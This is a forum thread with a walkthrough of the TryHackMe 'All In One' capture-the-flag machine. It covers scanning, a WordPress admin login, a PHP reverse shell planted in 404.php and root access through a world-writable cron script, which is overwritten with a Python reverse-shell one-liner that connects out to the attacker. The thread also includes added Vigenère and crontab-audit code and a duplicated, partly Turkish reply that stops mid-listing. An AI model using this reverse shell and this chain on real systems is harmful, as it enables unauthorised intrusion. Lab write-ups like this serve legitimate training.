TryHackMe | All In One

Pytang

Contributing Member
18 Oct 2014
317
327
subdomain

Difficulty: Medium

Hello, in this post I will walk through the solution of the machine named All In One on TryHackMe.

Let's start with an Nmap scan; ports 21, 22 and 80 are open.

21: FTP
22: SSH
80: HTTP
Code:
root@kali:nmap -sC -sV 10.10.52.170
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-09 15:39 EST
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 15:39 (0:00:03 remaining)
Nmap scan report for 10.10.166.147                          
Host is up (0.22s latency).                                      
Not shown: 997 closed ports                                    
PORT   STATE SERVICE VERSION                                    
21/tcp open  ftp     vsftpd 3.0.3                                
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)        
| ftp-syst:                                                
|   STAT:                                                        
| FTP server status:                                          
|      Logged in as ftp                                            
|      TYPE: ASCII                                                  
|      No session bandwidth limit                                
|      Session timeout in seconds is 300                            
|      Control connection is plain text                            
|      Data connections will be plain text                      
|      At session startup, client count was 4                        
|      vsFTPd 3.0.3 - secure, fast, stable                        
|_End of status                                                      
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                        
|   2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA)        
|   256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA)            
|_  256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519)      
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))                  
|_http-server-header: Apache/2.4.29 (Ubuntu)                        
|_http-title: Apache2 Ubuntu Default Page: It works                  
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel            
                                                                           
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds


I type the machine's IP address into the address bar to open the website, and a default Apache page greets me. Looking at the page source I found no hints, so I scan the site's directories with the gobuster tool.

Code:
root@kali:gobuster dir -u http://10.10.52.170 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.52.170
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/04/27 15:44:13 Starting gobuster
===============================================================
/wordpress (Status: 301)
/hackathons (Status: 200)
/server-status (Status: 403)

I open the /hackathons directory; the page says "dammit, how much I hate the smell of vinegar", so I inspect the page source. From the source I understand that we can decrypt the cipher using Vigenère with the key Keep Going.


Encrypted : Dvc W@iyur@123
Key: KeepGoing
Decrypted : Try H@ckme@123

As for our other hidden directory, when I open /wordpress I find a freshly installed WordPress, so I immediately analyse it with the WPScan tool.

Code:
root@kali:~# wpscan --url 10.10.52.170/wordpress
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.52.170/wordpress/ [10.10.52.170]
[+] Started: Tue Aug 17 10:28:33 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.52.170/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.52.170/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.52.170/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.52.170/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.52.170/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |  - http://10.10.52.170/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 1.8
 | Style URL: http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://10.10.52.170/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/plugins/mail-masta/readme.txt

[i] User(s) Identified:

[+] elyana
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.244.196/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] reflex-gallery
 | Location: http://10.10.52.170/wordpress/wp-content/plugins/reflex-gallery/
 | Latest Version: 3.1.7 (up to date)
 | Last Updated: 2021-03-10T02:38:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 3.1.7 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Aug 17 10:28:37 2021
[+] Requests Done: 2
[+] Cached Requests: 38
[+] Data Sent: 636 B
[+] Data Received: 1.074 KB
[+] Memory used: 203.102 MB
[+] Elapsed time: 00:00:03

From the scan result I learned that a user named elyana exists. I tried logging into WordPress as elyana with the password Try H@ckme@123, but that failed. I then tried the password H@ckme@123 and it worked.

Now that we are an administrator, let's edit the theme's 404.php page to get a reverse shell.
I paste the PHP reverse shell into our 404.php page and change the details it asks us to change.


In the terminal I start listening for incoming connections by typing nc -lvnp port, then browse to the 404.php page and successfully receive the reverse shell.

I find the user.txt file in elyana's home directory, but we don't have permission to read the file.
Code:
bash-4.4$ cd /home
cd /home
bash-4.4$ ls -la
ls -la
total 12
drwxr-xr-x  3 root   root   4096 Oct  5  2020 .
drwxr-xr-x 24 root   root   4096 Oct  5  2020 ..
drwxr-xr-x  6 elyana elyana 4096 Oct  7  2020 elyana
bash-4.4$ cd elyana
cd elyana
bash-4.4$ ls -la
ls -la
total 48
drwxr-xr-x 6 elyana elyana 4096 Oct  7  2020 .
drwxr-xr-x 3 root   root   4096 Oct  5  2020 ..
-rw------- 1 elyana elyana 1632 Oct  7  2020 .bash_history
-rw-r--r-- 1 elyana elyana  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 elyana elyana 3771 Apr  4  2018 .bashrc
drwx------ 2 elyana elyana 4096 Oct  5  2020 .cache
drwxr-x--- 3 root   root   4096 Oct  5  2020 .config
drwx------ 3 elyana elyana 4096 Oct  5  2020 .gnupg
drwxrwxr-x 3 elyana elyana 4096 Oct  5  2020 .local
-rw-r--r-- 1 elyana elyana  807 Apr  4  2018 .profile
-rw-r--r-- 1 elyana elyana    0 Oct  5  2020 .sudo_as_admin_successful
-rw-rw-r-- 1 elyana elyana   59 Oct  6  2020 hint.txt
-rw------- 1 elyana elyana   61 Oct  6  2020 user.txt
bash-4.4$ cat user.txt
cat user.txt
cat: user.txt: Permission denied

There is a "hint" telling us that the password may be hidden somewhere in the system.
Code:
bash-4.4$ cat hint.txt
cat hint.txt
Elyana's user password is hidden in the system. Find it ;)

I look through elyana's files on the system; the private.txt file catches my attention, and when I check its contents it gives us the elyana user's password.

Code:
bash-4.4$ find / -user elyana -type f 2>/dev/null
find / -user elyana -type f 2>/dev/null
/home/elyana/user.txt
/home/elyana/.bash_logout
/home/elyana/hint.txt
/home/elyana/.bash_history
/home/elyana/.profile
/home/elyana/.sudo_as_admin_successful
/home/elyana/.bashrc
/etc/mysql/conf.d/private.txt
bash-4.4$ cat /etc/mysql/conf.d/private.txt
cat /etc/mysql/conf.d/private.txt
user: elyana
password: E@syR18ght

Now that we have elyana's password, we can connect directly over SSH.
Code:
kali@kali:sshpass -p "E@syR18ght" ssh [email protected]
-bash-4.4$ cat user.txt
VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259
-bash-4.4$ echo "VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259" | base64 -d
THM{49jg666alb5e76shrusn49jg666alb5e76shrusn}

Crontab, used on Linux and Unix systems, lets you run a command, script or application that you specify at a time or interval you choose. I will go down this path and try to become root.
Code:
-bash-4.4$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *  * * * root    cd / && run-parts --report /etc/cron.hourly
25 6  * * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6  * * 7 root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6  1 * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    /var/backups/script.sh
Code:
bash-4.4$ ls -l /var/backups/script.sh
ls -l /var/backups/script.sh
-rwxrwxrwx 1 root root 73 Oct  7  2020 /var/backups/script.sh

I change the script as below. Meanwhile, on the other side I start listening with Netcat on the port I chose below.
Code:
#!/bin/bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your tun0 IP address>",<your chosen port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Code:
kali@kali:/data/src$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.244.196] 46344
bash: cannot set terminal process group (2639): Inappropriate ioctl for device
bash: no job control in this shell
root@elyana:~# cd /root
cd /root
root@elyana:~# cat root.txt
cat root.txt
VEhNe3VlbTJ3aWdidWVtMndpZ2I2OHNuMmoxb3NwaTg2OHNuMmoxb3NwaTh9
root@elyana:~# cat root.txt | base64 -d
cat root.txt | base64 -d
THM{uem2wigbuem2wigb68sn2j1ospi868sn2j1ospi8}

THANKS FOR READING, I HOPE IT HELPED.
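As an added example (not code from the post), here is the Vigenère step done in Python. The key advances only on letters, non-letter characters such as '@' and the digits pass through unchanged, and letter case is preserved; that is exactly why "Dvc W@iyur@123" decrypts to "Try H@ckme@123" under the key KeepGoing (the space in "Keep Going" is ignored).

```python
# Vigenère cipher, letters-only variant: non-letters are copied through and do not
# consume key characters, so "@" and digits survive untouched. Example values are
# the ciphertext and key quoted in the post; this is not the author's code.

def _shift(ch: str, key_ch: str, decrypt: bool) -> str:
    """Shift one ASCII letter by the key letter, keeping the letter's case."""
    base = ord("A") if ch.isupper() else ord("a")
    key_val = ord(key_ch.upper()) - ord("A")
    offset = ord(ch) - base
    offset = (offset - key_val) % 26 if decrypt else (offset + key_val) % 26
    return chr(base + offset)


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    # Only letters of the key matter: "Keep Going" and "KeepGoing" are the same key.
    key_letters = [k for k in key if k.isalpha()]
    if not key_letters:
        raise ValueError("key must contain at least one letter")
    out = []
    i = 0  # index into the key; advances only when a letter is processed
    for ch in text:
        if ch.isalpha():
            out.append(_shift(ch, key_letters[i % len(key_letters)], decrypt))
            i += 1
        else:
            out.append(ch)  # '@', digits and spaces pass through
    return "".join(out)


def vigenere_decrypt(ciphertext: str, key: str) -> str:
    return vigenere(ciphertext, key, decrypt=True)


def vigenere_encrypt(plaintext: str, key: str) -> str:
    return vigenere(plaintext, key, decrypt=False)


# Values quoted in the post (from the /hackathons page source).
CIPHERTEXT = "Dvc W@iyur@123"
KEY = "KeepGoing"

if __name__ == "__main__":
    plain = vigenere_decrypt(CIPHERTEXT, KEY)
    print(plain)                                   # Try H@ckme@123
    # Round-trip check: re-encrypting must give the original ciphertext back.
    assert vigenere_encrypt(plain, KEY) == CIPHERTEXT
```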
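The privilege escalation above rests on a root cron job that points at a world-writable script (-rwxrwxrwx /var/backups/script.sh). As an added defender-side example (not from the post), this Python audit parses a system-format crontab, pulls out every absolute path in each command, and flags paths that are writable by others, owned by a non-root user while run as root, or sitting in a world-writable directory without the sticky bit. The crontab text and the permission table are constructed copies of what the post shows, and stat_fn is an assumed hook so the check can run offline against that table or, by default, against the real filesystem.

```python
import os
import re
import stat
from typing import Callable, Dict, List, NamedTuple, Tuple


class Finding(NamedTuple):
    line_no: int
    user: str
    path: str
    reason: str


# Constructed copy of the /etc/crontab shown in the post. In the system crontab
# (unlike a user crontab) the sixth field is the user the command runs as.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *  * * * root    cd / && run-parts --report /etc/cron.hourly
25 6  * * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*  *    * * *   root    /var/backups/script.sh
"""

# Constructed stat table standing in for os.stat on the target: path -> (uid, mode).
# script.sh mirrors the "-rwxrwxrwx 1 root root" line from the post's ls -l output.
SAMPLE_STAT: Dict[str, Tuple[int, int]] = {
    "/etc/cron.hourly": (0, 0o040755),
    "/usr/sbin/anacron": (0, 0o100755),
    "/etc/cron.daily": (0, 0o040755),
    "/var/backups": (0, 0o040755),
    "/var/backups/script.sh": (0, 0o100777),
}

StatFn = Callable[[str], Tuple[int, int]]


def real_stat(path: str) -> Tuple[int, int]:
    st = os.stat(path)
    return st.st_uid, st.st_mode


def dict_stat(table: Dict[str, Tuple[int, int]]) -> StatFn:
    """Build a stat_fn that answers from a table; missing paths raise like os.stat."""
    def _stat(path: str) -> Tuple[int, int]:
        if path not in table:
            raise FileNotFoundError(path)
        return table[path]
    return _stat


# An absolute path: a '/' not glued to a word char or another '/', then path chars.
# A bare "/" (as in "cd /") is not matched because at least one path char must follow.
PATH_RE = re.compile(r"(?<![\w/])/[\w./-]+")


def parse_system_crontab(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, user, command) for each job line; skip comments and VAR=value."""
    entries = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 6)  # m h dom mon dow user command...
        if len(fields) < 7:
            continue
        entries.append((line_no, fields[5], fields[6]))
    return entries


def _writable_by_others(mode: int) -> bool:
    return bool(mode & stat.S_IWOTH)


def audit_crontab(text: str, stat_fn: StatFn = real_stat) -> List[Finding]:
    findings: List[Finding] = []
    for line_no, user, command in parse_system_crontab(text):
        for path in PATH_RE.findall(command):
            try:
                uid, mode = stat_fn(path)
            except (FileNotFoundError, PermissionError):
                continue  # cannot inspect it, so nothing to report
            reasons = []
            if _writable_by_others(mode):
                reasons.append("world-writable")
            if user == "root" and uid != 0:
                reasons.append(f"owned by uid {uid} but run as root")
            # A world-writable parent without the sticky bit lets others replace the file.
            parent = os.path.dirname(path) or "/"
            try:
                _, pmode = stat_fn(parent)
                if _writable_by_others(pmode) and not pmode & stat.S_ISVTX:
                    reasons.append("parent directory world-writable")
            except (FileNotFoundError, PermissionError):
                pass
            findings.extend(Finding(line_no, user, path, r) for r in reasons)
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB, stat_fn=dict_stat(SAMPLE_STAT)):
        print(f"line {f.line_no}: {f.path} is {f.reason} (job runs as {f.user})")
```

To audit a live host, call audit_crontab(open("/etc/crontab").read()) with the default stat_fn; the same parser applies to files under /etc/cron.d, which share the user field.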

Gladiaus

Contributing Member
17 Jul 2021
317
83
Baku, Azerbaijan
A useful topic, enjoy the forum.

darkswan

Contributing Member
19 Jun 2021
254
139
KARS
744ajlf.png


Zorluk: Medium

Merhaba, bu yazımda TryHackMe sitesinde bulunan All In One isimli makinenin çözümünü anlatacağım.

Nmap taraması yaparak başlayalım, 21, 22 ve 80 portları açık.

22:
SSH
21: FTP
80: HTTP
Kod:
root@kali:nmap -sC -sV 10.10.52.170
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-09 15:39 EST
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 15:39 (0:00:03 remaining)
Nmap scan report for 10.10.166.147                          
Host is up (0.22s latency).                                      
Not shown: 997 closed ports                                    
PORT   STATE SERVICE VERSION                                    
21/tcp open  ftp     vsftpd 3.0.3                                
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)        
| ftp-syst:                                                
|   STAT:                                                        
| FTP server status:                                          
|      Logged in as ftp                                            
|      TYPE: ASCII                                                  
|      No session bandwidth limit                                
|      Session timeout in seconds is 300                            
|      Control connection is plain text                            
|      Data connections will be plain text                      
|      At session startup, client count was 4                        
|      vsFTPd 3.0.3 - secure, fast, stable                        
|_End of status                                                      
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                        
|   2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA)        
|   256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA)            
|_  256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519)      
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))                  
|_http-server-header: Apache/2.4.29 (Ubuntu)                        
|_http-title: Apache2 Ubuntu Default Page: It works                  
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel            
                                                                           
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds


Makine ip adresini adres çubuğuna yazarak websitesine giriş yapıyorum, beni default bir apache sayfası karşıladı, sayfanın kaynak kodlarına baktığımda herhangi bir ipucu bulmadım, gobuster toolunu kullanarak sitenin dizinlerini taratıyorum.

Kod:
root@kali:gobuster dir -u http://10.10.52.170 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.52.170
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/04/27 15:44:13 Starting gobuster
===============================================================
/wordpress (Status: 301)
/hackathons (Status: 200)
/server-status (Status: 403)

I browse to the /hackathons directory; the page says "dammit, how much I hate the smell of vinegar", so I inspect the page source. From the source I understand that we can decrypt the cipher with Vigenère using the key Keep Going.



Encrypted : Dvc W@iyur@123
Key: KeepGoing
Decrypted : Try H@ckme@123
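
To show what the online tool did with the hint above, here is an added Vigenère implementation (example code written for this writeup, not part of the original post or the room). It reproduces the page's result: only letters are shifted and only letters consume a key character, so the "@" and the digits pass through untouched; the case of each letter is preserved.

```python
import string

ALPHABET = string.ascii_uppercase


def _shift(text: str, key: str, decrypt: bool) -> str:
    """Apply a Vigenère shift to the letters of ``text``.

    Only A-Z/a-z are transformed and only letters advance the key
    position; digits, spaces and symbols (such as '@' in the hint) are
    copied through unchanged.  This is the convention most online
    Vigenère tools use and it is what reproduces the page's result.
    """
    key_shifts = [ALPHABET.index(k) for k in key.upper() if k in ALPHABET]
    if not key_shifts:
        raise ValueError("key must contain at least one letter")
    out = []
    k = 0  # index into the key, advanced only when a letter is processed
    for ch in text:
        if ch.isalpha() and ch.upper() in ALPHABET:
            base = ord("A") if ch.isupper() else ord("a")
            shift = key_shifts[k % len(key_shifts)]
            if decrypt:
                shift = -shift
            out.append(chr((ord(ch) - base + shift) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return "".join(out)


def vigenere_encrypt(plaintext: str, key: str) -> str:
    return _shift(plaintext, key, decrypt=False)


def vigenere_decrypt(ciphertext: str, key: str) -> str:
    return _shift(ciphertext, key, decrypt=True)


if __name__ == "__main__":
    # Ciphertext and key are the values from the /hackathons hint on the page.
    ciphertext, key = "Dvc W@iyur@123", "KeepGoing"
    plaintext = vigenere_decrypt(ciphertext, key)
    print(f"{ciphertext!r} with key {key!r} -> {plaintext!r}")
    # Round trip: re-encrypting the result must give the original ciphertext.
    assert vigenere_encrypt(plaintext, key) == ciphertext
```

Because the key position only advances on letters, a "Keep Going" key and a "KeepGoing" key are equivalent here: the space in the key is dropped when the shifts are computed.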

Our other hidden directory is /wordpress; when I open it I find a freshly installed WordPress, so I immediately analyse it with the WPScan tool.


Code:
root@kali:~# wpscan --url 10.10.52.170/wordpress
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.52.170/wordpress/ [10.10.52.170]
[+] Started: Tue Aug 17 10:28:33 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.52.170/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.52.170/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.52.170/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.52.170/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.52.170/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |  - http://10.10.52.170/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 1.8
 | Style URL: http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://10.10.52.170/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/plugins/mail-masta/readme.txt

[i] User(s) Identified:

[+] elyana
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.244.196/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] reflex-gallery
 | Location: http://10.10.52.170/wordpress/wp-content/plugins/reflex-gallery/
 | Latest Version: 3.1.7 (up to date)
 | Last Updated: 2021-03-10T02:38:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 3.1.7 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Aug 17 10:28:37 2021
[+] Requests Done: 2
[+] Cached Requests: 38
[+] Data Sent: 636 B
[+] Data Received: 1.074 KB
[+] Memory used: 203.102 MB
[+] Elapsed time: 00:00:03

The scan told me that a user named elyana exists. I tried to log in to WordPress as elyana with the password Try H@ckme@123 but failed. I then tried the password H@ckme@123 and it worked.

Now that we are an administrator, let's get a reverse shell by editing the theme's 404.php page.
I paste the PHP reverse shell into our 404.php page and change the details it asks us to change.



In the terminal I start listening for incoming connections with nc -lvnp port, browse to the 404.php page and successfully receive the reverse shell.



I find the user.txt file in elyana's home directory, but we do not have permission to read it.
Code:
bash-4.4$ cd /home
cd /home
bash-4.4$ ls -la
ls -la
total 12
drwxr-xr-x  3 root   root   4096 Oct  5  2020 .
drwxr-xr-x 24 root   root   4096 Oct  5  2020 ..
drwxr-xr-x  6 elyana elyana 4096 Oct  7  2020 elyana
bash-4.4$ cd elyana
cd elyana
bash-4.4$ ls -la
ls -la
total 48
drwxr-xr-x 6 elyana elyana 4096 Oct  7  2020 .
drwxr-xr-x 3 root   root   4096 Oct  5  2020 ..
-rw------- 1 elyana elyana 1632 Oct  7  2020 .bash_history
-rw-r--r-- 1 elyana elyana  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 elyana elyana 3771 Apr  4  2018 .bashrc
drwx------ 2 elyana elyana 4096 Oct  5  2020 .cache
drwxr-x--- 3 root   root   4096 Oct  5  2020 .config
drwx------ 3 elyana elyana 4096 Oct  5  2020 .gnupg
drwxrwxr-x 3 elyana elyana 4096 Oct  5  2020 .local
